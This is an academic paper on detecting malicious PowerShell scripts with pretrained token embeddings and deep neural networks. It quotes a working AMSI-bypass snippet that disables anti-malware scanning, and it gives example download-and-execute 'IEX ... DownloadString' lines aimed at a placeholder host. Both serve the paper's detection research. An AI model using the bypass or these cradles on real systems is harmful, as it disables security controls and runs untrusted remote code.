Detecting Malicious PowerShell Scripts Using Contextual Embeddings

05/23/2019 ∙ by Amir Rubin, et al. ∙ Microsoft ∙ Ben-Gurion University of the Negev

PowerShell is a command line shell that is widely used in organizations for configuration management and task automation. Unfortunately, PowerShell is also increasingly used by cybercriminals for launching cyber attacks against organizations, mainly because it is pre-installed on Windows machines and exposes strong functionality that may be leveraged by attackers. This makes the problem of detecting malicious PowerShell scripts both urgent and challenging. We address this important problem by presenting several novel deep learning based detectors of malicious PowerShell scripts. Our best model obtains a true positive rate of nearly 90% while maintaining a false positive rate of less than 0.1%. Our models employ pre-trained contextual embeddings of words from the PowerShell "language". A contextual word embedding is able to project semantically similar words to proximate vectors in the embedding space. A known problem in the cybersecurity domain is that labeled data is relatively scarce in comparison with unlabeled data, making it difficult to devise effective supervised detection of malicious activity of many types. This is also the case with PowerShell scripts. Our work shows that this problem can be largely mitigated by learning a pre-trained contextual embedding based on unlabeled data. We trained our models' embedding layer using a scripts dataset that was enriched by a large corpus of unlabeled PowerShell scripts collected from public repositories. As established by our performance analysis, the use of unlabeled data for the embedding significantly improved the performance of our detectors. We estimate that the usage of pre-trained contextual embeddings based on unlabeled data for improved classification accuracy will find additional applications in the cybersecurity domain.


I Introduction

Cybercrime in its various forms poses a serious threat to the modern digital society. In the ongoing cyber arms race, attackers frequently rely on tools already existing on the victim's system, a technique known as "Living off the Land". These methods have become increasingly popular in recent years [1]. Several reports by security companies observe the popularity in cyber attacks of using PowerShell [2, 3, 4], a scripting shell normally used in organizations for configuration management and task automation. PowerShell can be used in different stages of an attack, either by a human attacker or by malicious software, to perform various malicious activities such as reconnaissance, gaining persistence in the attacked system, communicating with a command and control server or fetching a payload. The volume and diversity of PowerShell usage in malicious activities make it an important attack vector to be addressed by defenders.

To facilitate better defense against script-based attacks on Windows systems, Microsoft released the Antimalware Scan Interface (AMSI, https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal). This programming interface provides defending systems with the capability to inspect the code executed by scripting engines (such as PowerShell, JavaScript and VBScript). While it gives defenders important optics into the scripts executed on the system, the AMSI interface by itself does not provide a solution against PowerShell-based malicious cyber activities. Moreover, the widespread and diverse usage of PowerShell scripting by legitimate users, such as network administrators and software developers, imposes a requirement for a very low false positive (FP) rate on defending systems. The importance and the challenging nature of defending against PowerShell-based attacks create a strong need for devising advanced machine learning (ML) techniques that can be applied to this problem. Such techniques should aim not only at extracting patterns of malicious code, but also at capturing the semantics discerning malicious from benign usage of PowerShell.

Recent scientific achievements in Deep Learning (DL) [5, 6, 7] provide many opportunities for the development of novel methods for efficient cyber defense. One of the major breakthroughs in DL is associated with the usage of contextual embeddings in various Natural Language Processing (NLP) tasks. Several methods for embedding words into vectors have been proposed in recent years [8, 9, 10, 11]. Generally, these methods leverage large datasets of text documents (such as Wikipedia articles) to obtain representations of words as vectors in Euclidean space from the contexts of their appearances in the document corpus. These embedding methods have gained popularity over traditional one-hot encoding in various NLP tasks because of their ability to project semantically similar words to proximate vectors in the embedding space. Pretrained embeddings can be used to initialize the first layer of a neural network trained to perform a particular task (for example, classification of documents to topics), thereby reducing the volume of data required for training.

As a viable alternative to the word embedding approach, several authors suggest encoding text as a sequence of vectors representing characters [12, 13]. Promising results for the application of DL methods to the classification of PowerShell command-lines (as opposed to general scripts) using such a character-level approach were reported in [14]. We note, however, that the problem of classifying general PowerShell scripts is different and significantly harder, since scripts are typically much longer than command-lines and their structure is generally much more complex, often including user-defined functions and references to external modules.

In this work, we propose a novel method for the classification (as benign or malicious) of PowerShell scripts. We aim to depart from traditional pattern recognition approaches and to provide a classification method for PowerShell scripts that is more resilient to evasion attempts by malicious attackers. To this end, we experiment with two popular text embedding approaches, Word2Vec (W2V) [8] and FastText [15, 16], trained on a dataset that contains a large corpus of unlabeled PowerShell scripts (we thank Lee Holmes for making this dataset available to us).

We use the following two datasets. The unlabeled dataset is a corpus of 368K distinct unlabeled PowerShell scripts and modules (we explain the difference between the notions of a module and a script in Section II) collected from the GitHub (https://github.com/) and PowerShell Gallery (https://www.powershellgallery.com/) public repositories. The second, smaller, dataset is the labeled dataset, consisting of benign PowerShell scripts and malicious PowerShell scripts, partitioned into a train set and a test set (collected over different periods of time).

The high-level structure of our model generation process is presented in Figure 1. Our method trains the detection model in two stages. During the first stage, we use the unlabeled dataset and the train set (labels are not used for learning contextual embeddings) to obtain a contextual embedding of PowerShell tokens. We provide examples demonstrating interesting semantic relationships captured by this embedding. During the second stage, we employ the embedding as a first layer for token inputs in a deep neural network trained (using the labeled scripts of the train set) to detect malicious PowerShell scripts. Our best model employs an architecture comprising both a character-level one-hot encoded input and a token-level embedding layer (pretrained using FastText), followed by several layers of CNN [17, 18] and LSTM-RNN [19] neural network units.

We use the labeled dataset for supervised training and for performing an extensive performance evaluation of different DL and traditional (such as logistic regression [20]) ML classification methods. The evaluation results we present establish that our new approach outperforms both traditional methods (based on features such as character-level and word-level n-grams and bag of words) and deep models that do not use pretrained embeddings but rather generate an embedding as part of the training process for the classification task. Moreover, we obtain even better results by combining both a token-level embedding layer and character-level one-hot encoding into a single neural network. This architecture improves over the results of traditional ML classifiers by 22 percentage points (pp) and by 11 pp over the results of deep learning models that do not employ pre-trained embeddings, achieving a recall of 89.4% on the test set while maintaining a low FP rate of 0.1%.

Contribution

To the best of our knowledge, our work is the first to address the important problem of detecting malicious PowerShell scripts. We present a novel DL-based detector of malicious PowerShell scripts that leverages a pre-trained contextual embedding. We conduct extensive evaluation comparing the performance of our detector with those of several alternative detection models. Our evaluation results establish that our detector significantly outperforms DL-based detectors that do not use a pre-trained embedding as well as traditional-ML-based detectors and is able to detect nearly 90% of malicious PowerShell scripts while maintaining an FP rate of only 0.1% on a test set collected over a different period of time than the train set.

Fig. 1: High-level structure of our model generation process.

A second, more general, key contribution made by this work is to demonstrate the power of contextual embedding methods in the cybersecurity domain. To the best of our knowledge, our work presents the first detector of malicious scripts that leverages a contextual embedding learnt using unlabeled data for increasing detection accuracy. The fact that embeddings based on unlabeled data can be used for enhancing the detection performance of supervised classification tasks is important, since unlabeled data are frequently available in abundance to the cyber defenders, whereas labeled data is typically more scarce and difficult to obtain. Since our approach is generic, it can be adapted for the classification of scripts in other languages as well as to other types of textual data that arise in cyberspace. We therefore expect that the usage of pre-trained contextual embeddings based on unlabeled data for improved supervised classification accuracy will find additional applications in the cybersecurity domain.

Our third contribution is that we show that models that combine character-level and token-level representations of scripts are able to provide performance that is superior to that of models that employ only a single type of representation.

The rest of this paper is organized as follows. In Section II, we provide required background on PowerShell, the AMSI programming interface, deep learning and contextual embeddings. Section III describes the datasets we use and the manner in which they are pre-processed. This is followed by a discussion of the contextual embedding of PowerShell tokens in Section IV. We describe the detection models we implemented in Section V and report on the results of our experimental evaluation in Section VI. Related work is surveyed in Section VII. Section VIII concludes with a short discussion of our results and avenues for future work.

II Background

II-A PowerShell

First released in 2006, PowerShell is a command line shell, widely used in organizations for configuration management and task automation. It has a powerful scripting language with various capabilities, accessible through cmdlets. These cmdlets are functional units, exposing system administration capabilities such as registry or file system access and general purpose utilities like a web client or text encoding utilities. For example, the Get-ItemProperty cmdlet reads values from the Windows registry. A PowerShell script is a sequence of PowerShell cmdlets that can be executed directly from the command line, or stored as a .ps1 file. Functional units of PowerShell may be combined into a single PowerShell module (.psm1 file), making the code easier to manage, reference, load or share.

PowerShell as an attack vector

Given the ease of access to system resources using PowerShell, the fact that it is pre-installed on Windows machines, the huge number of cmdlets available and the many ways in which PowerShell code can be obfuscated [14], PowerShell is a tool of choice for malware authors to achieve their goals. From reconnaissance via port scanning, through privilege escalation using shell-code injection [2] and gaining persistence using registry editing (see http://az4n6.blogspot.com/2018/06/malicious-powershell-in-registry.html), to payload dropping using a web client [4], PowerShell can serve as a fileless attack vector, enabling the attacker to leave minimal traces on a compromised machine.

Indeed, several recently-published reports discuss the growing popularity of PowerShell’s usage as an attack vector and analyze the various techniques by which this is done [3, 2, 4, 21]. A recent report by IBM ([21]) observes that over 57% of the attacks they analyzed were fileless, and many of these used PowerShell as an attack vector. This highlights the importance of detecting malicious PowerShell code.

II-B Anti-Malware Scan Interface (AMSI)

In 2015, Microsoft announced a new capability built into Windows 10, called the Anti-Malware Scan Interface (AMSI, https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal), enabling applications to request an anti-malware scan by the anti-malware product installed on the machine. By default, PowerShell code is sent via AMSI for anti-malware scanning prior to its execution. The labeled dataset we use in this work (described in more detail in Section III) consists of real-world PowerShell scripts collected using AMSI, which we briefly describe now.

As surveyed in the past (see [3, 2, 4]), PowerShell code can be obfuscated using numerous techniques, which is often done by malicious code for evading detection. More specifically, PowerShell code may be deeply obfuscated by iteratively applying obfuscation mechanisms multiple times, thus wrapping the original code in several obfuscation layers. Scripts are submitted to the anti-malware product by AMSI just before the de-obfuscated code is presented to the host for execution. This means that AMSI’s output often provides much more visibility into the PowerShell code about to be executed than is available from direct analysis of the possibly-obfuscated content of PowerShell scripts.

Specifically, any value supplied to the Invoke-Expression cmdlet will be fully uncloaked by AMSI. For example, when executing the PowerShell command Invoke-Expression $env:var, the value of the environment variable $env:var is sent by AMSI to be evaluated before execution and is thus output by it.

Nevertheless, there are also cases in which AMSI's output is not fully de-obfuscated and is dynamically resolved to plain code only during execution. This may occur, e.g., when the PowerShell code uses an expression that applies a string manipulation technique (such as string concatenation) as a method parameter, or when a method name is composed of characters with alternating casing.

Several techniques for evading AMSI are known, and samples of such evasion attempts were observed in our dataset. For instance, the following code sets the value of the AmsiInitFailed property to true (see https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/):

[Ref].Assembly
.GetType('System.Management.Automation.AmsiUtils')
.GetField('amsiInitFailed','NonPublic,Static')
.SetValue($null,$true);

The above PowerShell code snippet is an example of an evasion technique that uses .NET's reflection mechanism to set the value of the private static property AmsiInitFailed in the AmsiUtils class to true, thus preventing the ScanContent method (not shown in the above code) from sending any content to the anti-malware engine for scanning. Attempts to disable AMSI can themselves be considered malicious activity, which can be detected by pin-point detectors dedicated to this task, as done by several popular anti-malware vendors (e.g., Microsoft Defender ATP; VirusTotal scans of AMSI bypass scripts show similar detections). We consider the development of such detectors as beyond the scope of this work.

By collecting real-world PowerShell scripts using AMSI rather than directly from a command-line shell, we leverage AMSI’s enhanced logging and de-obfuscation capabilities, allowing better visibility into the executed code of PowerShell scripts.

II-C Deep Learning

In this section, we provide background on deep learning concepts and architectures that is required for understanding the deep learning based malicious PowerShell scripts detectors that we present in subsection V-A.

Artificial Neural Networks (ANNs) [22, 23, 24] are a family of machine learning models, composed of a collection of layers. A typical ANN is composed of one or more input layers, a single output layer, and one or more hidden layers. A Deep Neural Network (DNN) has multiple hidden layers. There are several key DNN architectures. In what follows, we briefly describe the architectures used by our detectors.

II-C1 Convolutional Neural Networks (CNNs)

A CNN is a learning architecture, traditionally used in computer vision [17, 18]. As its name implies, the main component of a CNN is a convolutional layer. For instance, given a 2D grayscale image, a convolutional layer uses 2D "filters" (or "kernels") of size m x n, for some integers m and n. As the filter slides over the 2D input matrix, the dot product between its weights and the corresponding window in the input is computed. Intuitively, the filter slides over the input in order to search for occurrences of some feature or pattern. The weights used in the filters are learnt during the training process.

Two additional layer types often used by CNNs (as well as by the RNN architecture we describe below) are the max pooling and dropout layers. A max pooling layer [25] "down-samples" neurons in order to generalize and reduce dimensionality and overfitting [26]. It applies an m x n window (for some integers m and n) across the input and outputs the maximum value within the window, thus reducing the number of parameters. A global max pooling layer is a special case of max pooling, where the size of the pooling window equals the size of the input feature map. Intuitively, when using a global max pooling layer on top of a convolutional layer, each filter is mapped to a single neuron, indicating whether the feature detected by this filter appears anywhere in the input.

Dropout layers [27] can be used in between layers to reduce overfitting by randomly "dropping" some of the inputs. Each node in the layer's input is output by the dropout layer with probability 1-p, or is "dropped out" (thus becoming disconnected from the next layer) with probability p.
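To make these layer types concrete, the following small Keras sketch (our own illustration with arbitrary toy dimensions, not code from this paper) stacks a 1D convolution, max pooling, global max pooling and dropout; the comments give the resulting tensor shapes.

from tensorflow import keras
from tensorflow.keras import layers

# Toy sequence input: 100 timesteps, 8 features per timestep (hypothetical sizes).
inputs = keras.Input(shape=(100, 8))
x = layers.Conv1D(filters=16, kernel_size=3, activation="relu")(inputs)  # -> (98, 16)
x = layers.MaxPooling1D(pool_size=2)(x)                                  # -> (49, 16)
x = layers.GlobalMaxPooling1D()(x)   # one value per filter -> (16,)
x = layers.Dropout(0.5)(x)           # randomly drops inputs during training only
outputs = layers.Dense(1, activation="sigmoid")(x)
model = keras.Model(inputs, outputs)
model.summary()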

II-C2 Recurrent Neural Networks (RNNs)

RNNs are neural networks able to process sequences of input representing data series such as text [28, 29], speech [30, 31, 32], handwriting [33] or video [34] in a recurrent manner, that is, by repeatedly using the input seen so far in order to process new input. We use an RNN network composed of long short-term memory (LSTM) blocks [19]. Each such block consists of a cell that stores a hidden state, able to aggregate/summarize inputs received over an extended period of time. In addition to the cell, there are three other components (referred to as gates) in an LSTM block. They control and regulate information flow into and out of the cell. Roughly speaking, the input gate determines the extent to which new input is used by the cell, the forget gate determines the extent to which the cell retains memory, and the output gate controls the level to which the cell's value is used to compute the block's output. A bidirectional RNN (BDRNN) network [35] is an RNN architecture in which two RNN layers are connected to the output, one reading the input in order and the other reading it in reverse order. Intuitively, this allows the output to be computed based on information from both past and future states. For instance, in the context of the sentiment analysis problem, when processing text from the middle of a sentence, text seen at the beginning of the sentence, as well as text seen at the end of the sentence, may be used by the computation.

II-D Contextual Embeddings

In the context of text analysis, a common practice is to add an embedding layer before the CNN or the RNN layer [36, 37, 38]. Embedding layers serve two purposes. First, they reduce the dimensionality of the input. Second, as done by our detectors, they can be used to represent the input in a manner that retains its context. The embedding layer converts the input (typically at the token level, but sometimes also at the character level, depending on the problem at hand) to a sequence of vectors. Embedding techniques are designed to embed tokens in an n-dimensional space (for an appropriately-selected n) by representing them as n-dimensional vectors.

Our detectors employ the widely-used Word2Vec (W2V) [8] and FastText [15, 16] contextual embedding algorithms, which use an ML model for learning the vector representation of tokens. In both algorithms, the underlying architecture of the model contains an input layer, a hidden layer of (appropriately selected) size n, and an output layer. Depending on the training method ("CBOW" or "skip-gram" [39]), we either try to predict a token based on its context (i.e., the tokens surrounding it), as done in CBOW, or to predict the context based on a given token, as done in skip-gram.

Following the learning phase, a sequence of values is stored in the hidden layer per every token in the corpus. These values serve as the vector representation of the token. The key difference between the two algorithms is the following. Whereas Word2Vec only embeds tokens as atomic units, FastText also embeds character n-grams (sub-tokens) extracted from these tokens. Specifically, each token is represented by the sum of the vector representations of the token itself and of its n-grams (our implementation uses character n-grams of several lengths). This representation implies that FastText is able to leverage the sub-tokens comprising each token. Specifically, this allows it to embed tokens that were not seen during the training stage (but may be input to the model once it is deployed), as long as their sub-tokens appeared in the corpus used to train the embedding.
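As an illustration of this property, the following gensim sketch (ours, not the paper's code; the variable tokenized_scripts and the n-gram range are hypothetical) trains a FastText model and queries a token that was never seen during training.

from gensim.models import FastText

# tokenized_scripts: list of token lists, e.g. produced by the tokenizer of Section III
# (hypothetical variable). min_n/max_n control the character n-gram lengths (illustrative values).
model = FastText(sentences=tokenized_scripts, vector_size=32, window=5,
                 min_count=10, min_n=3, max_n=6, sg=0)

# A token absent from the training corpus still gets a vector,
# composed from the vectors of its character n-grams.
vec = model.wv["downloadstringasync"]                     # works even if unseen during training
print(model.wv.most_similar("downloadstringasync", topn=3))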

III Datasets and Pre-Processing

We use two datasets: an unlabeled dataset and a labeled dataset. The unlabeled dataset consists of approx. 368K unlabeled PowerShell scripts and modules (*.ps1 and *.psm1 files) collected from public repositories, including GitHub (https://github.com/) and the PowerShell Gallery (https://www.powershellgallery.com/).

The labeled dataset was collected and labeled inside our organization. To accomplish this, we used the capabilities provided by the AntiMalware Scan Interface (AMSI) (see Section II). Using AMSI, we were able to collect PowerShell scripts and modules, as their content is sent for security analysis prior to execution.

Our labeled dataset is composed of scripts (for presentation simplicity, we refer to all PowerShell code recorded by AMSI as scripts, regardless of whether these are scripts or modules). It contains distinct malicious scripts, obtained by executing known malicious programs inside a sandbox and recording all their PowerShell activity via AMSI. It also contains a collection of distinct benign (or clean) PowerShell scripts (also recorded via AMSI). Unlike malicious scripts, benign scripts were executed on regular machines within our organization rather than inside a sandbox. Only scripts that were executed exclusively on machines with no indication of malicious activity 30 days prior to data collection were labeled as benign.

The following subtle point regarding the dataset labeling process should be emphasized. When AMSI is used for monitoring the execution of a program, the PowerShell code it executes is reported in its entirety. Consequently, when a malicious script uses benign modules (which is often the case), the benign module’s code is reported by AMSI as well. In order not to label such benign modules as malicious, we label a script/module as malicious only if it was seen exclusively in malicious contexts, that is, only if it was never observed on clean machines.

III-A Data Preprocessing

We carefully pre-processed the scripts we collected in order to normalize the PowerShell code observed, regularizing digits and random values to improve detection and evaluation results. Digits were replaced with asterisk signs ('*') in order to better deal with random values, IP addresses, random domain names (which in many cases contain digits), dates, version numbers, etc. Labeled code was also preprocessed to eliminate identical (or nearly-identical) scripts (a process we call data de-duplication), in order to reduce the probability of data leakage [40], as we explain next.
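The digit regularization step amounts to a single substitution; the snippet below is a minimal sketch of this normalization (the function name is ours).

import re

def regularize(script_text):
    """Replace every digit with '*' so that IP addresses, dates, version numbers
    and other random numeric values map to the same normalized form."""
    return re.sub(r"\d", "*", script_text)

# Example:
print(regularize("DownloadString('https://10.0.0.5/payload2019.txt')"))
# -> DownloadString('https://**.*.*.*/payload****.txt')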

III-B Deduplicating Data

As we use cross-validation to evaluate the performance of our detection models on labeled data, we took extra care to reduce the probability of data leakage. In our setting, a data leakage problem may result from using identical (or nearly-identical) scripts for training the model and for validating it. Indeed, we observed in our dataset PowerShell scripts that differ by only a small number of characters. In most of these cases, the difference stemmed from the usage of random file names, different IP addresses, or different numbers/types of white space characters (for example spaces, tabs and newlines).

The existence of identical or nearly-identical scripts in a PowerShell scripts-corpus collected inside a real-world organization is almost certain. Many of the benign scripts observed on machines inside the organization run as part of corporate maintenance procedures and are therefore likely to be observed on many machines and/or on the same machine at different times. As for malicious scripts, since we executed (inside a sandbox) numerous malicious executables in order to collect the PowerShell code they invoke, some subsets of these programs may have belonged to the same malware family, and thus invoked similar or even identical PowerShell code. Moreover, almost-identical scripts can also be used by programs from different malware families that launch similar types of cyber attacks.

To prevent data leakage, we perform a de-duplication process for eliminating identical or nearly-identical scripts from our dataset. A toy example of this process, explained next, is depicted in Figure 2, assuming it is applied to the following three (artificial) single-command scripts:

  1. IEX(New-Object Net.WebClient).DownloadString('https://domain/a**bc*.txt'));

  2. IEX(New-Object Net.WebClient).DownloadString('https://domain/d*e*f.txt'));

  3. Invoke-WebRequest -Uri 'https://domain/gh**i*.exe' -OutFile 'C:\gh**i*.exe'

The de-duplication process consists of the following 4 stages (a Python sketch of the full pipeline follows the list):

Fig. 2: An example of the scripts de-duplication process.
  1. Script tokenization
    Scripts are split into tokens. Any symbol which is not in the set {'a'-'z', 'A'-'Z', '*', '$', '-'} is used as a delimiter. We remind the reader that digits are replaced by asterisk signs ('*') during the regularization process, hence they are not used as delimiters.

    We do not use the dollar sign ('$') as a delimiter because it is used in PowerShell to refer to a variable. Thus, for example, we consider true and $true as two different tokens. As for the dash sign ('-'), it appears inside PowerShell tokens such as Write-Host and Invoke-Command and is therefore also not used as a delimiter. We only use tokens of length at least 2, since a single character by itself has no meaning in PowerShell. The tokenization process yielded four million distinct tokens. Since PowerShell is case-insensitive, all tokens were normalized to lower case.

  2. Rare tokens elimination
    Since our goal is to deduplicate similar scripts based on the tokens contained in them, we remove random-string tokens by keeping only tokens that appear in more than 100 scripts. To motivate the selection of 100 as the token frequency threshold, Figure 3 presents a histogram (on a log-log scale) of the number of tokens that appear in exactly x distinct scripts, for each value x. Note the change in trend around 512 scripts, indicating that many tokens appear in fewer than roughly 512 scripts, while substantially fewer tokens appear in more than that. To ensure that we do not remove too many tokens, we used 100 as the threshold for a token to be considered significant. This resulted in a collection of 14,216 significant tokens. We note that rare tokens are removed only for the sake of de-duplication. In general, such tokens are still used for training the embedding layer.

    Fig. 3: Number of tokens appearing in exactly x scripts, on a log-log scale.
  3. Scripts clustering
    By identifying each script according to the set of the significant tokens that appear in it, we effectively cluster together all scripts that differ only in the rare tokens they contain.

  4. Cluster representatives selection
    We arbitrarily select from each of the resulting script clusters a single representative script; these representatives constitute the de-duplicated dataset.
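The following Python sketch implements the four stages above under the assumptions stated in the list (tokens of length at least two, a significance threshold of 100 scripts); function and variable names are ours.

import re
from collections import Counter

# Split on anything outside {a-z, A-Z, *, $, -} and keep tokens of length >= 2.
TOKEN_RE = re.compile(r"[A-Za-z*$\-]{2,}")

def tokenize(script_text):
    # PowerShell is case-insensitive, so tokens are lower-cased.
    return [t.lower() for t in TOKEN_RE.findall(script_text)]

def deduplicate(scripts, min_script_count=100):
    tokenized = [set(tokenize(s)) for s in scripts]

    # Keep only "significant" tokens: those appearing in more than min_script_count scripts.
    doc_freq = Counter(tok for toks in tokenized for tok in toks)
    significant = {tok for tok, df in doc_freq.items() if df > min_script_count}

    # Cluster scripts by their set of significant tokens; keep one representative per cluster.
    representatives = {}
    for script, toks in zip(scripts, tokenized):
        key = frozenset(toks & significant)
        representatives.setdefault(key, script)
    return list(representatives.values())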

We note that the dimensions of the dataset specified earlier are the numbers of distinct scripts after the de-duplication process.

As shown by Table I, the de-duplication process reduced the number of labeled instances by 41%.

Original Distinct % Deduped
Clean scripts 41%
Malicious scripts 44%
Total scripts 41%
TABLE I: De-Duplicated Scripts Statistics

IV Contextual embedding of PowerShell tokens

We remind the reader that our training approach, illustrated by Figure 1, consists of an embedding stage followed by a supervised training stage. We learn the contextual embedding using both the unlabeled dataset (consisting of 368K distinct PowerShell scripts and modules collected from public repositories) and the train set (consisting of 106,840 labeled PowerShell scripts); the test set is not used for learning the embedding.

In this section, we briefly describe the techniques we used to embed tokens from the PowerShell corpus in an n-dimensional vector space and share some interesting findings derived from these embeddings, showcasing their potential contribution to detection. We experimented with two DL-based text embedding techniques – W2V and FastText (see Section II-D). In both cases, the input for the embedding is the same: we tokenized the scripts as described above.

The scripts we use to generate the embedding contain approximately four million distinct tokens, most of which appear in only a few scripts. Using all these tokens would generate a huge embedding layer, making the processing time of both learning the embedding and training the model impractically large. Consequently, only tokens that appeared in at least ten scripts were used for embedding. This resulted in 81,111 distinct tokens.

We chose to use the CBOW rather than the Skip-Gram architecture [39], since the former is faster to train and generally works better on large training sets with many frequent words.
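A minimal gensim sketch of this embedding step, assuming the scripts have already been tokenized as described in Section III (the variable tokenized_scripts, the embedding dimension and the window size are illustrative assumptions):

from gensim.models import Word2Vec

# tokenized_scripts: token lists for the unlabeled corpus plus the train set
# (hypothetical variable; labels are not used here). sg=0 selects CBOW.
# min_count is a rough stand-in for the paper's "appears in at least ten scripts" filter.
w2v = Word2Vec(sentences=tokenized_scripts, vector_size=32, window=5,
               min_count=10, sg=0, workers=8)
w2v.save("powershell_w2v.model")
print(len(w2v.wv))   # size of the embedded vocabulary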

IV-A Tokens embedding in action

W2V embedding is known for capturing semantic similarities between different words, which are frequently preserved in linear combinations of embedded vectors [8]. In this subsection, we share a few interesting examples to illustrate the potential of the representations of tokens used in PowerShell scripts. These examples demonstrate how different tokens representing similar semantics in PowerShell code are embedded as neighboring vectors. Using t-SNE [41] for reducing dimensionality, in Figure 4 we present a 2-dimensional visualization of the vector representation (using W2V) of 5,000 randomly selected tokens and some interesting tokens which we highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together as well.

Fig. 4: t-SNE 2D visualization of 5,000 tokens using W2V.

Examining the vector representations of the tokens, we found a few additional interesting relationships between the tokens, which we describe next.

Tokens similarity

Using the W2V vector representation of tokens we can use the Euclidean distance to measure similarity in the embedding space. Many cmdlets in PowerShell have an alias. We found that using the W2V embedding, in many cases, the token closest to a given cmdlet is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest and its alias IWR, and the Get-ChildItem command and its alias GCI.
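Such alias relationships can be inspected with a nearest-neighbour query; a short sketch, reusing the hypothetical w2v model trained above (gensim's most_similar ranks by cosine similarity, whereas the distances reported in this section are Euclidean, but the alias typically still ranks at or near the top):

# Nearest tokens to a cmdlet in the embedding space.
print(w2v.wv.most_similar("invoke-expression", topn=3))   # expect 'iex' near the top
print(w2v.wv.most_similar("invoke-webrequest", topn=3))   # expect 'iwr'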

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k and $true (see the right side of Figure 5). The first three are usually used to represent a numeric variable, while the last naturally represents a boolean constant. As expected, the $true token did not match the others – it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell and cybersecurity, we checked the representations of the tokens: bypass, normal, minimized, maximized and hidden (see the left side of Figure 5). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing all other four tokens.

Fig. 5: t-SNE 3D visualization of selected tokens.

Linear Relationships

As W2V preserves linear relationships, computing linear combinations of the W2V vector representations yields semantically meaningful results. Below are a few interesting relationships we found:

  high - $false + $true ≈ low
  '-eq' - $false + $true ≈ '-neq'
  DownloadFile - $destfile + $str ≈ DownloadString
  'Export-CSV' - $csv + $html ≈ 'ConvertTo-html'
  'Get-Process' - $processes + $services ≈ 'Get-Service'

In each of the above expressions, the ≈ sign signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector resulting from the computation on the left side, in terms of Euclidean distance.
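Analogies of this kind map onto gensim's positive/negative form of most_similar; a sketch with the same hypothetical model (again using cosine rather than Euclidean distance):

# 'Get-Process' - $processes + $services  ~  'Get-Service'
print(w2v.wv.most_similar(positive=["get-process", "$services"],
                          negative=["$processes"], topn=1))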

V Classification Models

In this section, we describe the detection models we implemented and evaluated. We report on our evaluation results in Section VI.

Fig. 6: A diagram of the "Token-Char" model architecture. The result of applying global max pooling on the character-level input is marked in blue, to emphasize the fact that it has been duplicated in order for it to be processed by the LSTM layer along with the token-level input.

We implemented and evaluated 10 deep learning detection models, which differ in their architectures and in terms of whether their input is processed as a sequence of tokens, a sequence of characters, or both. In order to assess the extent to which the DL models are able to compete with traditional detection approaches, we also implemented two detectors that are based on widely-used traditional methods for feature extraction. We proceed with the details.

V-A Deep-Learning Based Detectors

We employ two deep-learning based architectures – a Convolutional-Neural-Network (CNN) and a combination of CNN and a Recurrent-Neural-Network (CNN-RNN).

V-A1 Token-Level Architectures

We refer to DL architectures that consider their input as a sequence of tokens as token-level architectures. We implemented two token-level architectures: One based on the CNN-RNN architecture of [42] and another based on the CNN architecture presented by [43, 44].

In both these architectures, on top of the embedding layer, we used a convolutional layer with 128 filters and a kernel of size 3. In the CNN architecture, we then performed global max pooling, followed by a dropout layer (see Section II-C). In the CNN-RNN architecture, on top of the convolutional layer, we used a max pooling layer of size 3, to preserve the sequential nature of PowerShell scripts, followed by a bidirectional LSTM layer with 32 units, a dropout of 0.5 and a recurrent dropout of 0.02. Finally, in both architectures we used a single-node dense layer with a Sigmoid activation function for classification. For full details, we provide our Keras [45] code for model definitions in the Appendix.
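For illustration, the following is a minimal Keras sketch of a token-level CNN-RNN model consistent with the description above (the embedding dimension, activation functions and optimizer are our assumptions; the authoritative definitions are those in the Appendix):

from tensorflow import keras
from tensorflow.keras import layers

vocab_size = 81_111    # tokens appearing in at least ten scripts (Section IV)
max_tokens = 2_000     # first 2,000 tokens of each script (Section V-A1)
embed_dim = 32         # assumed embedding dimension

inputs = keras.Input(shape=(max_tokens,))
x = layers.Embedding(vocab_size, embed_dim)(inputs)       # optionally initialized with W2V/FastText vectors
x = layers.Conv1D(filters=128, kernel_size=3, activation="relu")(x)
x = layers.MaxPooling1D(pool_size=3)(x)                   # keeps the sequential structure
x = layers.Bidirectional(layers.LSTM(32, dropout=0.5, recurrent_dropout=0.02))(x)
outputs = layers.Dense(1, activation="sigmoid")(x)

cnn_rnn = keras.Model(inputs, outputs)
cnn_rnn.compile(optimizer="adam", loss="binary_crossentropy")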

As previously mentioned, the first layer of both our DL architectures is an embedding layer. We experimented with the following three options for setting the initial weights in the embedding layer, for a total of 6 different token-based DL detection models (a sketch of loading pretrained vectors into the embedding layer follows the list):

  • Weights sampled from a uniform distribution: The two resulting models are henceforth referred to as "CNN" and "CNN-RNN". We sometimes refer to this option as inline embedding.

  • Weights pretrained using W2V: The two resulting models are henceforth referred to as "CNN-W2V" and "CNN-RNN-W2V".

  • Weights pretrained using FastText: The two resulting models are henceforth referred to as "CNN-FastText" and "CNN-RNN-FastText".
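For the pretrained options, the sketch below shows one way the W2V (or, analogously, FastText) vectors could be loaded into the Keras embedding layer; it assumes the gensim model sketched in Section IV and standard gensim/Keras usage, and is not the paper's own code.

import numpy as np
from gensim.models import Word2Vec
from tensorflow import keras
from tensorflow.keras import layers

w2v = Word2Vec.load("powershell_w2v.model")     # the CBOW model sketched in Section IV
token_index = w2v.wv.key_to_index                # token -> row id; reuse W2V's vocabulary order
vocab_size, embed_dim = len(token_index), w2v.vector_size

# Copy each token's pretrained vector into the embedding matrix.
embedding_matrix = np.zeros((vocab_size, embed_dim), dtype="float32")
for token, idx in token_index.items():
    embedding_matrix[idx] = w2v.wv[token]

pretrained_embedding = layers.Embedding(
    vocab_size, embed_dim,
    embeddings_initializer=keras.initializers.Constant(embedding_matrix),
    trainable=True)   # the embedding is fine-tuned during supervised training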

